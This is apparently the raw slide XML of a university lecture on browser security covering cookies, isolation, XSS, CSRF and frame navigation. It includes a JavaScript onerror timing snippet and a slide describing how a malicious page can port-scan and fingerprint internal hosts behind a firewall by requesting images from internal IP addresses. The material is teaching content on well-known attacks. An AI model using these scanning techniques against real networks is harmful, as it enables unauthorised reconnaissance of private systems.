                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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106809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6809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5240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-7620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" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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106809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6809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5240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4.xm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33.jpe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4.png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paypal.com/cgi-bin/webscr?cmd=_home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3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4.e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5.emf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4.bin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wmf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30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57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30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId9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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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0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Browser Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40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309938"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter: Yinzhi Cao</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slides Inherited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and Modified from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. John Mitchell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" y="147638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" charset="0"/>
              </a:rPr>
              <a:t>EECS 450 Northwestern University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6477000" y="147638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Winter 2013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Http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p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Security Case Study</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame Navigation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JavaScript onError</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Basic function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Triggered when error occurs loading a document or an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example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>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> handler if image does not exist and cannot load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66800" y="3495675"/>
            <a:ext cx="7467600" cy="923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lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="image.gif" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="alert('The image could not be loaded.')“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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6153150"/>
            <a:ext cx="5872163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en-US" dirty="0"/>
              <a:t>http://www.w3schools.com/jsref/jsref_onError.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165076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JavaScript timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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smtClean="0"/>
              <a:t>Sample code</a:t>
            </a:r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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2316162"/>
            <a:ext cx="7467600" cy="3170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0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> id="test" style="display: none"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(’test’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> start = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>test.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> end = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          alert("Total time: " + (end - start));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     test.src = "http://www.example.com/page.html";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;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8998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Port scanning behind firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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smtClean="0"/>
              <a:t>JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Example:  &lt;img src=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Use timeout/onError to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Fingerprint webapps using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 4" descr="DS15server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4040188"/>
            <a:ext cx="243681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3975100" y="3883025"/>
            <a:ext cx="46038" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="317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812800" y="3698875"/>
            <a:ext cx="909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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8" descr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0363" y="4279900"/>
            <a:ext cx="1487487" cy="11382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5459413" y="4478338"/>
            <a:ext cx="1387475" cy="796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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r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4211638" y="6477000"/>
            <a:ext cx="1046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Firewall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700338" y="3771900"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197"/>
                <a:gd name="T12" fmla="*/ 211 h 2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97" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="18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7" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="147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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1) “show me dancing pigs!”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297113" y="4332288"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
